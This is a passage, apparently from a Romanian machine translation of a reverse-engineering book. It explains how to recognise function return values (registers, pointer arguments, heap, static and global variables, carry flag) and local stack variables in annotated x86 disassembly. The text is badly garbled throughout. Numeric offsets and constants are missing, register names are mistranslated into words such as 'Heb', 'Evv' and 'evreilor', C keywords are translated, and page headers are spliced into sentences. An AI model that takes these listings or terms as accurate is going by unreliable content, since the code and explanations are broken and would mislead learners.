b;Întoarce a;) Main () {char so [] = "salut, marinar!";Char sl [ ];// Invertiți linia astfel,înregistrându -l în SL Reverse (& SL [ ], & S [ ]);Printf ("%s \ n", & sl [ ]);// Invertiți linia SL, rescriereaacesteia Reverse (& SL [ ]);Printf ("%s \ n", & sl [ ]);// Afișăm suma a două numere Printf ("%x \ n", sumă( x x ));Capitolul Identificarea valorii returnate de funcție Rezultatulcompilării acestui exemplu ar trebui să privească aproximativ așa cum se arată în lista Listarea Rezultatulcompilării exemplului, prezentat prin listarea principală proc aproape;Cod xref: start+af^p var = byte ptr - hvar = dword ptr -loh var c = dword ptr -och var = dword ptr - var = word ptr - push ebp mov ebp, esp;Deschiderama Stack Sub esp, h;Rezervăm memorie pentru variabile locale MOV EAX, DWORD PTR AHELLOSAILOR;"Bună, marinar!";Aducemprimul de primii octeți ai liniei „Hello, Sailor!” În registrul EAX ;Probabil, compilatorul copiază linia în variabilalocală;viclean MOV [EBP+VAR ], EAH MOV EE, DWORD PTR AHELLOSAILOR+ MOV [EBP+VAR C], ECX MOV EDX, DWORD PTRAHELLOSAILOR+ MOV [EBP+VAR ], EDX MOV AX, Word Ptr Ahellosailor [EBP+VAR ], Topor;Exact, linia „Bună ziua,marinar!”Copiați într -o variabilă locală;ѵag tip char s [ xl j ;Numărul x a fost obținut prin calculareanumărului de octeți copiați -;Patru iterații de patru octeți în fiecare - total, șaisprezece Lea esh,[ebp+var ];Încărcarea în Echul indicatorului la o variabilă locală ѵAG ,;care conține linia „Hello, World ” PushEsh;int;Transferul funcției inverse l la linia "Bună ziua, lume!";Uite, - IDA a determinat incorect tipul, - bine, ceeste int ,;Când este char * Cu toate acestea, amintind cum a fost copiată linia;Vom înțelege motivul eroriiDizassembler Lea Edx, [EBP+VAR ];Încărcarea în Echul indicatorului la nefertilizate; Variabilă locală ѵAG Împingeți edx;Char *;Transmiterea funcției inverse l a indicatorului către nefertilizate;Un tipvariabil Char SL [ ] Numărul a fost obținut prin scădere;deplasările variabilei ѵAG din deplasarea următoareivariabile ,;ѵAG care conține linia „Hello, World ” Partea III Identificarea structurilor cheieale limbilor de nivel ridicat; x - x = x sau în performanță zecimală - fapt;Transmiterea pointerului cătreo variabilă incomodă indică faptul că;că, cel mai probabil, funcția va returna un sens prin ea -;Ia -o pentru notata Cal Reverse L Adăugare ESP, ;Apelarea funcției inverse l LEA EAX, [EBP+VAR ];Încărcarea în indicatorul EAX lavariabila var Împingeți eax;Transferul funcției printf a indicatorului la variabila ѵAG , - de atunci;Funcțiasfidătoare nu a inițializat această variabilă, este posibil;A presupune că chemarea și -a returnat sensul prin ea ;Poatecă funcția inverse l a modificat și variabila ѵag ;Totuși, acest lucru nu se poate spune cu certitudine până atunci,;Până când a fost studiat codul ei Push Offset uk CALL PRINTF ADD ESP, ;Apelarea funcției printf pentru ascoate linia Lea esh, [ebp+var ];Încărcarea în Echul indicatorului la variabilă ѵAG , aparent ,;care conține ovaloare returnată de funcția inverse l Push Ech;Char *;Transferul invers al indicatorului la variabilă ѵAG ;Funcțiainverse poate fi, de asemenea, returnată la variabila ѵAG ;sensul tău sau într -un fel îl modifică ;Cu toateacestea, este posibil să nu fie returnat!;Clarificarea situației permite analiza codului cauzat Apelați Reverse Adăugați esp, ;Apelarea funcției inverse Lea Edx, [EBP+VAR ];Încărcarea în indicatorul EDX la variabilavar Împingeți edx;Transferul funcției printf a indicatorului la variabila ѵAG ;De la valoarea returnată de funcțieprin registrele EDX: EAH;Nu este folosit, putem presupune că nu o returnează;Registre și în variabilă ѵAG Dar aceastanu este altceva decât o presupunere Push Offset UK CALL PRINTF ADD ESP, ;Apelarea funcției printf Împinge h;Transferul funcției de sumă x tip int Capitolul Identificarea valorii returnate de funcție Push H;Transferul funcției de sumă x tip int Suma de apel Adăugare esp, ;Apelareala suma PUSH EAX funcție;Registrul EAX conține valoarea returnată de funcția sumă;Transmitem funcțiile sale printf caargument Push Offset UK CALL PRINTF ADD ESP, ;Apelarea funcției printf Mov ESP, EBP POP EBP;Închiderea cadruluistivei Retn endp principal;int cdecl inverse l (char *, int);Vă rugăm să rețineți că prototipul funcției este definitincorect!;De fapt, așa cum am stabilit deja din analiza funcției sfidătoare, aceasta;Se pare că: Reverse (char *dst,char *src) ;Numele argumentelor este dat pe baza faptului că argumentul de stânga este un indicator;la un tamponinconsistent și, cel mai probabil, acționează în rol;Receptorul, respectiv, argumentul corect în acest caz estesursa Reverse l Proc în apropiere Cod xref: main+ ope arg = dword ptr arg = dword ptr och push ebp ebp,esp;Deschide rama Stack MOV EAX, [EBP+arg ];Încărcăm valoarea argumentului Arg în EAX PUSH EAH;Trimiteți funcțiiarg Strcpy Mov ech, [ebp+arg ];Încărcăm valoarea argumentului Arg în CE Push Ech;Trimiteți funcții arg strcpy Apelați Strcpy Adăugare ESP, ;Copiați conținutul liniei indicate de arg în buffer;Care este indicat dearg PARTEA III Identificarea structurilor cheie ale limbilor de nivel înalt mov edx, [EBP+arg ];Încărcămconținutul argumentului arg în EDX care indică bufferul;care conține o linie doar copiată Apăsaţi Edx;Char *;Trimitețifuncția strrev arg Apelați strrev add esp, ;Funcția STRREV inversează linia indicată de arg ;Prin urmare,funcția inverse l își returnează cu adevărat propria sa;Valoare prin argumentul arg , transmis prinreferință ;Dimpotrivă, linia indicată de arg rămâne neschimbată;Prin urmare, prototipul funcției inverse l aratăastfel :;Void inverse l (char *dst, cost char *src);;Nu neglijați niciodată calificarea Constance, pentru că esteclar;indică faptul că variabila pe care o indică dat;Index, folosit doar pentru citire Aceste informații suntsemnificative;va facilita munca cu listarea DizAssemblery, mai ales când sunteți;Vei reveni la ea după ceva timp,resetarea minuțioasă;Algoritmul programului studiat Pop ebp;Închideți rama lui Stack Retn reverse l endp;Inteclinverse (char *);Dar de data aceasta prototipul funcției este determinat corect!;(Ei bine, cu excepția faptului cătipul de retur, nu int int) Reverse Proc în apropiere C DE XREF Main+ Fîp Arg - DWORD PTR Pushh EBP Mov EBP, ESP;Deschide rama Stack MOV EAX,[EBP+arg ];Încărcăm conținutul argumentului arg în EAX Push eax,- char *;Trimiteți funcții arg strev apel strrevadd esp, ;Inversăm linia, înregistrând rezultatul pentru același loc ;Prin urmare, funcția inverse returnează cuadevărat valoarea;prin arg , și presupunerea noastră preliminară s -a dovedit a fi;Corect!Pop ebp;Închideți rama luiStack GPAVA Identificarea valorii returnate de funcția Retn;Prototipul funcției inverse în conformitate culook -urile recente de studii;Deci: void inverse (char *s) Reverse Endp Suin Proc în apropiere Cod xref: main+ opearg = dword ptr arg = dword ptr och push ebp ebp, esp;Deschide rama Stack MOV EAX, [EBP+arg ];Încărcăm valoareaargumentului Arg în EAX Adăugați eax, [ebp+arg ];Fold arg C arg , înregistrarea rezultatului în EAX MOV[EBP+arg ], EAX;Copiați rezultatul adăugării arg și arg înapoi la arg ;Hackerii neexperimentați pot lua acestlucru pentru a returna valoarea;Argumentul, însă, această presupunere este incorectă ;Cert este că argumentele,funcțiile transmise după finalizarea acesteia;Se împing din stivă și imediat „mor” Nu uita: ;Argumentele transmise prinsens se comportă în același mod ca local;variabile MOV EAX, [EBP+arg ];Dar acum returnarea este cu adevărat copiată înregistrul EAX;sens Prin urmare, prototipul funcției arată astfel :;Int sum (int a, int);Pop ebp;Închideți rama luiStack Returnarea valorilor retn sum printr -o returnare dinamică a memoriei (Bunch) a valorii prin argumentul transmisde link nu decorează cu adevărat prototipul funcției Acesta încetează instantaneu să fie intuitiv și necesită explicațiidetaliate care indică faptul că nu trebuie transmis nimic cu acest argument, dimpotrivă, ar trebui să fiți pregătit săacceptați unele date de aici Există o problemă mai gravă - nu în toate cazurile datelor de retur, este cunoscută înavans - se dovedește adesea doar în procesul de lucru ca funcție Evidențiați tamponul „cu o marjă”?Urât și neeconomic -chiar și în sisteme cu memorie virtuală, volumul său nu este nelimitat Acum, dacă funcția numită alocat independentmemoria pentru sine, doar prin nevoie, și apoi a returnat indicatorul Făcut repede şi foarte bine!Eroarea multorprogramatori începători este doar o încercare de a returna indicatorul la variabilele locale, dar, din păcate, ei „mor”împreună cu finalizarea funcției, iar indicatorul returnat indică partea III Identificarea structurilor cheie alelimbilor de nivel înalt în „Cosmos” Soluția corectă este să alocați memoria dintr -o grămadă (memorie dinamică), săspunem, o provocare pentru Malloc sau Nou - această memorie „trăiește” până la eliberarea forțată cu funcțiile de libersau de ștergere, respectiv Pentru a analiza programul, mecanismul izolatului de memorie nu este semnificativ Rolulprincipal este jucat de tipul de valoare returnată Este destul de ușor să distingem indicatorul de alte tipuri - doarindicatorul poate fi folosit ca expresie cadou Vom analiza exemplul dat în lista ! ^^ #include #include #include char * myfunk (int a) {char * x;x = (char *) malloc ( ); ltoa (a, x, );Întoarce x;) char *x;x = myfunk ( x );Printf (" x%s \ n", x);gratuit (x);Rezultatul compilării acestui exemplueste prezentat în lista Principalul proc aproape;Cod xref: start+af^p var = dword ptr - pushh ebp mov ebp,esp;Deschide rama Stack Împinge ECX;Subliniem memoria pentru o variabilă locală cu o dimensiune de octeți (veziѵAG ) Împinge h;Trimiteți funcțiile MyFUNC de tip int Sunați myfunk add esp, ;Numim myfunk - rețineți că niciunargument nu este funcții;Nu amânat de link![EBP+VAR ], EAC CAPITOLUL Identificarea valorii returnate de funcția ;Copierea valorii returnate de funcție în variabilă ѵAG MOV EAX, [EBP+VAR ];Super încărcăm valoarea returnată defuncția din EAX!PUSH EAH;Transmitem valoarea funcției printf returnate de funcție;Judecând după specificator, tipul devaloare returnat este Char *;Întrucât funcțiile MyFunk nu erau niciunul dintre argumente nu a fost transmis desoftware;Link, a alocat clar memoria pe cont propriu și a scris acolo;Linia rezultată și dacă funcțiile MyFunt au fosttransmise una sau;Mai multe argumente pe link?Atunci - nu ar exista încredere;că nu a returnat unul dintre astfel deargumente înapoi, preliminar;După ce a modificat -o ;Cu toate acestea, modificarea este opțională - să spunem,transmitem funcțiile;semne pentru două rânduri, iar ea returnează indicatorul la cel al lor;Care, să zicem, mai scurtsau conține mai multe vocale ;Prin urmare, nu orice întoarcere Pointerul indică modificarea Push Offset AOXS;„Ox%s \ n” CALL PRINTF ADD ESP, ;Apel printf - Ieșire pe linia de liniireturnate de funcția MyFUNC Mov ech, [ebp+var ];În Ech, încărcăm valoarea indicatorului returnat de funcția MyFunk PushEch;Gol *;Transmitem indicatorul returnat de funcția MyFunk ;Deci, MyFunk a alocat într -adevăr memoria în modindependent;Sunați Malloc Apelați Free Add ESP, ;Eliberăm memoria selectată de MyFunk pentru a returna sensul Mov ESP,EBP POP EBP;Închideți rama lui Stack Retn;Astfel, prototipul MyFunk arată astfel :;Char* myfunk (ITTA) Endp principalmyfunk proc în apropiere Cod xref: main+ viteză var = dword ptr - arg = dword ptr push ebp mov ebp, esp;Deschiderama Stack Împinge ECX;Rezervăm memorie pentru variabile locale Partea III Identificareastructurilor cheie ale limbilor de nivel ridicat împinge H;Size t apelează malloc add esp, ;Subliniem x octeți dememorie dintr -o grămadă sau pentru nevoile noastre proprii ale funcției ,;sau pentru a returna rezultatul Deoarece dinanaliza codului sfidător;Știm deja funcțiile pe care MyFunk returnează indicatorul, foarte mult;Este probabil ca apelulMallocului să aloce memorie în acest scop ;Cu toate acestea, apelurile Malloc pot fi mai multe, iar indicatorul;Seîntoarce doar la unul dintre ei MOV [EBP+VAR ], EAH;Amintiți -vă indicatorul din variabila locală ѵAG PUSH H;int;Transmitem funcțiile argumentului itoa x (Extreme on the Right) - Obligatoriu;Sistem de solicitare pentrutraducerea numărului MOV EAX, [EBP+VAR ];Încărcăm conținutul indicatorului în EAC în memoria alocată din grămadă PUSHEAH;Char *;Transmitem funcțiile indicatorului ITOA către buffer pentru a returna rezultatul Mov ech,[ebp+arg ];Încărcăm valoarea argumentului argument în EAX Push Ech; int ;Transmitem funcțiile argumentului ITOA arg - valoarea tipului int Apelați itoa add esp, och;Funcția ITOA transformă numărul într -o linie și îl scrie într -unsoftware tampon;Pointer transmis MOV EAX, [EBP+VAR ];Întoarceți indicatorul în regiunea de memorie alocată de MyFunk însine;Grămadă și care conține rezultatul Itoa Mov ESP, EBP POP EBP;Închideți rama lui Stack Retn myfunk endp returnareavalorilor prin variabilele globale „Opera de săpun” a re -marcurilor odată cu revenirea indicatorilor continuă seria„revenirea valorilor prin variabile globale (și/sau orur la variabile globale)” De fapt, variabilele globale sunt un tonrău Un astfel de stil de programare este caracteristic în principal pentru programatori cu gândire, ireversibil deideologii de bază cu mecanismul său de apel subprogram Citiți mai multe despre identificarea variabilelor globale dincapitolul , aici ne vom concentra eforturile tocmai pe studiul mecanismelor de revenire a valorilor prin variabileglobale GPAVA Identificarea valorii returnate de funcția , de fapt, toate variabileleglobale pot fi considerate argumente implicite ale fiecărei funcții cauzate și, în același timp, ca valorilereturnate Orice funcție nu le poate citi și modifica în mod arbitrar și nici „transmisia”, nici „returnarea”variabilelor globale nu sunt dezvăluite prin analiza codului funcției sfidătoare - pentru aceasta este necesarăexaminarea cu atenție a cauzată În special, ar trebui să aflați dacă manipulează cu variabile globale și dacă da - cucare Puteți utiliza abordarea „de la urât” - vizualizarea segmentului de date Găsiți toate variabilele globale,determinați deplasarea acesteia și, trecând prin căutarea contextuală în întregul fișier, identificați funcțiile la carese referă Pe lângă global, există variabile statice De asemenea, sunt localizate în segmentul de date, dar suntdisponibile direct numai pentru funcțiile care le -au declarat Mai precis, restricția nu este impusă variabilelor însine, ci pe numele lor Pentru a oferi alte funcții acces la propriile variabile statice, este suficient să transmitețiindicatorul Din fericire, acest truc nu creează probleme pentru hackeri (cel puțin unii Spitens îl declară cu un„decalaj în apărare”) Lipsa de acces direct la variabilele statice „extraterestre” și nevoia de a interacționa cufuncția de proprietar prin interfața previzibilă (indicatorul returnat) vă permit să împărțiți programul în moduleindependente separate, fiecare dintre ele putând fi analizate separat Pentru a nu fi nefondat, vom demonstra acest lucruîntr -un exemplu practic (lista ) ^și^ting £ d & Exemplu^dshionsgriruschi^return Valori prin statica globală ♦includ char* myfunk (int a) {static char x [ ] = {"luni", "marți", "miercuri", "joi", "vineri", "" Sâmbătăduminică "};Return & x [a- ] [ ];} Main () printf ("%s \ n", myfunc ( )); rezultatul compilării exemplului dat în Listarea , Compilatorul Microsoft Visual C ++ cu setări implicite arată ca afișat în lista ■ & dy?Codxref: main+ -lp arg = dword ptr pushh ebp mov ebp, esp;Deschide rama Stack Informații mai detaliate despre aceastăproblemă pot fi găsite în „legăturile încrucișate” din capitolul , „Identificarea variabilelor globale” Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt MOV EAX, [EBP+arg ];Încărcăm valoarea argumentului argument în EAX Sub eax, ;Reduceți EAX pe unitate Aceasta indică indirectcă;Arg nu este un indicator, deși operațiunile matematice pe semne în C;Permis și utilizat activ Shl eah, ;Înmulțiți(arg - ) cu trecerea bițiului la dreapta;În patru poziții, este egală cu înmulțirea cu ( == ) Adăugați eah,offset Aponedelnik;„Luni”;Îndoiți valoarea rezultată cu indicatorul de bază pe linia liniilor;situat în segmentul dedate Iar în segmentul de date sunt fie;Variabile statice sau globale ;Deoarece valoarea argumentului arg esteînmulțită cu o anumită valoare;(în acest caz la ), putem presupune că avem de -a face;Two -DIDENDAȚIONAL În acest caz,o linie fixă ​​cu un tablou;lungimi Astfel, EAC conține un indicator pe o linie cu un index;Arg - pop ebp;Închidețicadrul lui Stack, revenind la registrul EAX la;Elementul corespunzător al tabloului După cum vedem, nu există;diferențafundamentală dintre revenirea indicatorului în regiunea de memorie;alocat dintr -o grămadă, cu întoarcerea indicatoruluila static;Variabile localizate în segmentul de date Retn myfunk endp min minim aproape Cod xref: start+af^p pushh ebpmov ebp, e sp;Deschide rama Stack PUSH ;Transmitem funcțiile de tip MyFunk Int;(a șasea zi - sâmbătă) Sunați myfunk addesp, ;Sunați myfunk push eax;Transmitem valoarea funcției printf returnate de MyFunk ;Judecând după linia specificilor,acesta este un indicator al liniei Push Offset AS;"%S \ n" apel printf add esp, pop ebp;Închideți rama lui Stack RetnGpava Identificarea valorii returnate de Endp Main Endp Aponedelnik DB 'Luni', , O, O;Date xref:myfunk+do;Prezența unei legături încrucișate cu o singură funcție sugerează că tipul;Această variabilă estestatică AVTornik Asreda Acetverg APQTNICA Asubota Avoskresene ca DB DB DB DB DB 'marți', 'Miercuri, Prote, joi ', ' vineri ', , , , , , , , , , , , , , , , , , , , , , , , , , , , , , 'sâmbătă', , , , , , , , 'duminică', O, O, O, O, O % S', Oah, O;DATA XREF: Main+Eîo compară acum exemplul anterior din lista cu variabile globale reale (listarea ) = Listarea * : un exemplu care demonstrează returnarea prin variabile globale ♦ include myfunk () {c= a+b;} Main () {a = x ;b = x ;Myfunk ();Printf ("%x \ n", c);} Rezultatul compilării exemplului din listarea ar trebui să arate ceva de genul acesta arătat în lista '■ Listarea , rezultatul compilării unuiexemplu din listarea PROCT PROCE NECHIP;C DE XREF: START+AF^P PUSHH MOV EBP EBP, ESP;Deschide rama Stack Sunațimyfunk Call MyFunc Atenție - Funcțiile, evident, nimic și nimic nu se întoarce Prin urmare, este transmis (conformconcluziilor preliminare) după cum urmează: void myfunk () prototipul său arată ca suma de apel;Numim funcția de sumăcare nu acceptă în mod clar și nu returnează niciun fel de Partea a III -a Identificareastructurilor cheie ale limbilor de nivel ridicat;semnificații Prototipul său preliminar arată astfel: void sum () Moveax, c;Încărcăm valoarea variabilei globale „C” în EAX ;Ne uităm la segmentul de date,-Deci, aici este o variabilă „C”,egală;zero Totuși, acest sens nu poate fi de încredere - poate este deja;a reușit să schimbe funcțiile cauzateanterior ;Asumarea modificării este consolidată de o pereche de legături încrucișate;Dintre care unul indică funcțiaSunt Sufixul „W”, final;Cross Link, indică faptul că Sunt scrie într -o variabilă;„C” un fel de sens Care?Putețiafla;Analizând codul în sine PUSH EAH;Transmitem valoarea returnată de funcția Sunt prin Global;Variabilă „cu” funcțieprintf ;Judecând după linia de specificații, argumentul are tipul int Push Offset ASC ;"%x \ n" CALL PRINTF ADDESP, ;Afișăm rezultatul de retur la terminal Pop ebp;Închideți cadrul stivei Retn Main Endp Sum Proc în apropiere C DEXREF: Main+ îp;Funcția sumei nu acceptă niciun argument prin stivă!Push EBP MOV EBP, ESP;Deschidem cadrul stivei Moveax, a;Încărcăm valoarea variabilei globale „A” în EAX ;Găsim „A” în segmentul de date, - da, există o legăturăîncrucișată către; Myfunk, care scrie ceva în variabila „a” ;Deoarece MyFunk Challenge a precedat suma, putem spune asta;Myfunk a revenitla „un” sens Adăugați eah, b;Îndoiți EAX (stocarea valorii variabilei globale „a”) s;conținutul variabilei globale„B”;(Totul de mai sus în raport cu „A” este adevărat pentru „B”) Mov with, eax;Plasăm rezultatul adăugării A+B învariabila „C”;După cum știm deja (din analiza funcției principale), funcția sumă din variabilă;„C” returnează rezultatulcalculelor sale ;Acum am aflat care sunt GPAVA Identificarea valorii returnate de funcția POP EBP;Închideți ramalui Stack Retn sum endp myfunk proc în apropiere C DE XREF: Main+ Speed ​​Push EBP EBP EBP, ESP;Deschide rama Stack MOVA, H;Alocăm variabila globală „A” valoare x MOV B, H;Alocăm variabila globală „B” valoarea x ;După cum amaflat din analiza celor două funcții anterioare - funcția MyFunk;Returnează rezultatul calculelor sale învariabile ;Acum am stabilit care și, în același timp, am putut afla;Cum interacționează trei funcții între ele ;Main ()apelează myfunk (), inițializează variabilele globale „a”;și „, apoi main () apelează sum (), plasând suma„ A` `b”c;Variabila globală „C”, în sfârșit, Main () ia „C” și o transferă prin;Fluxul printf pentru ieșire pe ecran ;UF Cumeste confuz totul, dar acesta este cel mai simplu exemplu de trei funcții!;Ce putem spune despre un program real în careexistă mii de aceste funcții;Mai mult, procedura de apel și comportamentul fiecăruia dintre ele;departe de atât deevident pop ebp retn myfunk endp a dd ;Date xref: myfunk+ viteză sumă+ viteză ;Date xref: myfunk+dîw sumă+ vitezăcu DD ;DATA XREF: Sum+Eîw Main+Dîr, judecând după legăturile încrucișate - toate cele trei variabile sunt globale,deoarece fiecare dintre ele are acces direct la mai multe funcții Întoarcerea valorilor prin steagurile procesoruluipentru majoritatea funcțiilor de asamblare se caracterizează prin utilizarea registrului steagurilor procesorului pentrua returna rezultatul succesului funcției Conform acordului general acceptat, steagul de transfer stabilit (CF) indică oeroare, al doilea loc în popularitate este steagul zero (ZF), iar restul steagurilor nu sunt practic utilizatedeloc Instalarea steagului de transfer este realizată de comanda STC sau de orice operație matematică care duce laformarea transferului (de exemplu, CMP A, unde A // funcția erorii de divizie Egg () {printf ("-err: div dezero \ n");} // Concluzia rezultatului divizării în ecran Ok (int a) {printf ("%x \ n", a);} // funcția de asamblare adiviziei // Împărtăși EAH în EAS, revenind privatul la EAX, iar restul la edx // În timp ce încercați Pentru a împărțiîn zero, setează steagul de transfer declspec (gol) myfunk () asm {xor edx, edx; resurrect edx, t E Comanda DIVeste împărțită în EDX: EAX Test ebx, ebx; verificarea divizorului pentru ZOLO J Z ERR; Dacă divizorul este zero,mergeți la ramura eg div ebx; împărțiți edx: eax în eugo (esh nu este, evident, egal cu zero) Ret; ieșiți laîntoarcerea privatului în EAX și restul către edx err: // Această sucursală primește control atunci când încearcă //diviziile cu zero STC Setați steagul de transfer semnalând eroarea și ret} ieșim // Înfășurați pentru myfunk// luați două argumente prin stivă - divizibil și divizor // și afișați rezultatul diviziei (sau mesajul pe eroare) peecran Decspec (Naked) myFunk (int a, int b) { ASM (Mov Eax, [esp+ ];Încărcăm conținutul argumentului „a” movebx, [esp+ ] în EAX;Încărcăm conținutul argumentului b 'apelează myfunk la EDX;Încercarea de a împărtăși A/B] PS OK;Dacă steagul de transfer este abandonat, afișăm rezultatul, altfel apelăm la ou;mesaj de eroare ret;Return OK: pusheah;Transmitem rezultatul diviziei și Sunați OK; Hai să -l ducem pe ecran Adăugați ESP, ;Curățăm stiva RET;Neîntoarcem Main () [MyFunk ( );} Capitolul Identificarea variabilelor locale de sticlă este plasată în stivă (deasemenea numită memorie automată) și sunt eliminate de acolo -funcția numită prin finalizarea acesteia Să luăm în considerare maidetaliat cum se întâmplă acest lucru În primul rând, argumentele, funcțiile transmise (dacă există) sunt întârziate înstivă, iar pe deasupra lor, adresa de întoarcere plasată acolo, așezată acolo cu instrucțiunea de apel care provoacăaceastă funcție După ce a primit managementul, funcția deschide STEKI Frame-the HERARD Registrul păstrează registrulanterior și îl stabilește egal cu Registrul ESP (proiectarea registrului din partea de sus a stivei) „Mai mare” (adică,în adresele mai tinere), Evv Este o zonă liberă de stivă, mai jos - date oficiale (Evv salvat, adresă de întoarcere) șiargumente Siguranța zonei de stivă situată deasupra vertexului stivei (Registrul ESP) nu este garantată de ștergere șidenaturare Poate utiliza în mod liber, de exemplu, manipulatorii de întrerupere a hardware -ului cauzate într -un locimprevizibil în timp imprevizibil b) În mod liber, în mod liber, variabilele locale ale adresei de întoarcere a Hebssalvate Hebums Arguments Adresa argumentelor Sub esp, x Fig Mecanismul de plasare a variabilelor locale în stivăPush Heb/MOV HEB, ESP Partea a III -a Identificarea structurilor cheie ale limbilor de nivel înalt șiutilizarea stivei de către funcția în sine (pentru a păstra registrele sau transmiterea argumentelor) va duce ladenaturarea acesteia Care este calea din această situație?- Mutați forțat indicele de sus al stivei, „ocupând” aceastăzonă a stivei Siguranța memoriei situate „mai jos” ESP este garantată de distorsiunile neintenționate, deoareceurmătorul apel al instrucțiunilor de apăsare va aduce date în partea de sus a stivei, fără a freca variabilele locale Lasfârșitul activității sale, funcția este obligată să returneze ESP la locul său anterior, altfel funcția RET va eliminaîntoarcerea din stivă, dar ceva imprevizibil (valoarea variabilei locale „superioare”) și va transmite The Controlul „înspațiu” Mecanismul de plasare Variabilele locale din stivă sunt prezentate în fig În fig (a) arată stareastivei la momentul apelului la funcție Ea deschide cadrul stivei, păstrând valoarea anterioară a registrului evreilor șiîl stabilește egal cu ESP În fig (b) este prezentată înfățișarea x octeți de memorie de sticlă pentruvariabilele locale Rezervarea se realizează prin mutarea registrului ESP „UP” - pe câmpul adreselor mai tinere De fapt,variabilele locale sunt plasate în stivă ca și cum ar fi încărcate acolo prin comanda push La sfârșitul activitățiisale, funcția crește valoarea registrului ESP, revenind -o la poziția anterioară, eliberând astfel memoria ocupată devariabile locale, apoi scoate stiva și restabilește sensul HEB, închizând astfel stiva cadru Adresarea variabilelorlocale Abordarea variabilelor locale este foarte similară cu abordarea Stack Arguments , numai argumentele suntlocalizate „sub„ Evv, iar variabilele locale sunt „mai sus” Cu alte cuvinte, argumentele au deplasări pozitive în raportcu Evv, iar variabilele locale sunt negative Prin urmare, sunt foarte ușor de distins unul de celălalt Deci, de exemplu,[heb+xxx] -argument [heb-xxx] -a variabilă locală I E Z -evr ■ n și Heb- HEB- HEB- EUR+ HEB+ HEB-OS HEB- EUR+OS * G FIG Abordarea variabilelor locale Această problemă a fost luată în considerare în detaliu însecțiune „Abordarea argumentelor din stivă” Capitolul , „Identificarea argumentelor funcțiilor ” Capitolul Identificarea variabilelor locale de sticlă Registrul de înregistrare al stivei Stackservește ca barieră: pe o parte a acesteia există argumente a funcției, și pe celelalte variabile locale (Fig ) Acum este clar de ce atunci când deschideți cadrul stivei, valoarea ESP este copiată pe Evră, altfel adresareavariabilelor și argumentelor locale ar fi mult mai complicată , iar dezvoltatorii de compilatori nu ar dori să -șicomplice viața fără nevoie Cu toate acestea, optimizarea compilatorilor poate aborda variabilele și argumentele localedirect prin ESP, eliberarea registrului ebraic pentru obiective mai utile Există multe variații ale implementării șieliberarea memoriei pentru variabilele locale S -ar părea că sub esp, xxx la intrare și adăugați esp, xxx la ieșire? Șiaici este Borland de la ++ (și alți alți compilatori) în efortul de a distinge de toate OS -ulTalllers își rezervămemoria nu printr -o scădere, ci prin creșterea esp da, cu un număr negativ (care implicit de majoritateadizassemblers este afișat ca o pozitivă foarte mare) Optimizarea compilatoarelor atunci când devierea unei cantitățimici de memorie Înlocuiți sub -Push Reg, care este mai mulți octeți mai scurti Acesta din urmă creează probleme evidentede identificare - încercați, descoperiți -o sau înaintea noastră, conservarea registrelor în stivă sau transferul deargumente sau rezervarea memoriei pentru variabilele locale Această problemă va fi mai detaliată A fost considerat mai târziu în acest capitol, în secțiunea „Identificarea memoriei Seesticse” Algoritmul pentrueliberarea memoriei este, de asemenea, ambiguu Pe lângă creșterea instrucțiunilor de înregistrare a vertexului StackAdăugați ESP, XXX (sau, în compilații deosebit de pervertite ale creșterii sale cu un număr negativ), proiectarea ESPdin Moscova, HEB (vă amintiți că la deschiderea stivei ESP a fost copiată la Heb și Hebs în sine în procesul deexecutare a funcției nu s -au schimbat) În cele din urmă, memoria poate fi lansată prin instrucțiunile ROR, împingândvariabilele locale una după alta într -un registru inutil Desigur, această metodă se justifică doar cu un număr mic devariabile locale Cele mai frecvente opțiuni pentru implementarea rezervării de memorie pentru variabilele locale șieliberarea acesteia sunt enumerate în tabel Tabelul Cele mai frecvente opțiuni pentru implementarea rezervăriimemoriei pentru variabilele locale și opțiunile sale de acțiune de lansare pentru implementarea rezervării memoriei SubESP, XXX Adăugare ESP, -xx Push Rele Discomplație Adăugare ESP, XXX Sub ESP, -xx Pop Reg Mov ESP, Identificarea EBP aIdentificării Mecanismul de excreție (memoria eliberarea instrucțiunilor de memorie sub și adăugare este insuportabilăși întotdeauna interpretată fără ambigui /păstrarea registrelor în stivă Situația este foarte complicată de faptul căfuncțiile sunt prezente și sunt prezente și „reale” comenzi de conservare a registrelor care se îmbină cu comenzilealocării memoriei Cum să afli: Câți octeți sunt rezervate pentru variabile locale și sunt rezervate deloc (o astfel desituație este posibilă și atunci când nu există variabile locale în funcții)? Acest tip de acest tip de maidetaliatPăsările de curte vor fi discutate în continuare în acest capitol, în secțiunea „Excluderea indicatorului încadru” Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat pentru a răspundela această întrebare permite căutarea de apeluri la celulele de memorie care se află „deasupra” registrului de Evră,adică celule cu deplasări relative negative Luați în considerare două exemple prezentate în lista : Listarea L tryust ”, care ilustrează determinarea numărului -Byte rezervat *>;Pentru variabilele locale Push, Hebus Push Push PushEH EH XXX XXX XXX MOV [Herar- ], x XXX XXX POP ECH ROR ORE HEBO HEBO ROT RET În stânga lor, fără apel la variabilelelocale, dar în dreapta există Un design de Moos [HEB- ], x , copiind o valoare de x într-o variabilă localăѵAG Și din moment ce există o variabilă locală, ar trebui alocată o memorie pentru ea Deoarece instrucțiunile Sub ESP,XXX și Adăugare ESP, XXX în corpul funcțiilor nu sunt observate - „Suspiciunea” se încadrează pe Push Ech, deoarececonținutul păstrat al registrului ECH este localizat în stivă de patru octeți „mai sus” HEB În acest caz, o singurăechipă este „suspectată” - Push Ech, deoarece Push Hebo nu trage rolul „rezervației” Dar dacă există mai mulți„suspecți”?Puteți determina volumul de memorie dedicată prin deplasarea variabilei locale „înalte”, care poate fidetectată în corpul funcției Adică, găsind toate expresiile de tip [EBP-XXX], alegem cea mai mare deplasare a XXX-încazul general, este egală cu numărul de octeți de memorie alocați pentru variabilele locale În anumite cazuri, se găsescvariabile locale anunțate, dar care nu sunt utilizate Ele ies în evidență (deși optimizarea compilatorilor aruncă pur șisimplu astfel de variabile ca fiind inutile), dar nu apare un singur apel pentru acestea, iar algoritmul descris mai susoferă o memorie rezervată dă un rezultat subestimat Cu toate acestea, această eroare nu afectează rezultatele analizeiprogramului Inițializarea variabilelor locale Există două modalități de inițializare a variabilelor locale: atribuireavalorii cerute de instrucțiunile Mool (de exemplu, MO [HERAR- ], x ) și împingerea directă a valorii îninstrucțiunile de stivă ale Push (de exemplu, Push Push x ) Această din urmă opțiune vă permite să combinațifavorabil alocarea memoriei pentru variabilele locale cu inițializarea lor (desigur, numai dacă există puține dintreaceste variabile) Compilatoarele populare din marea majoritate a cazurilor efectuează 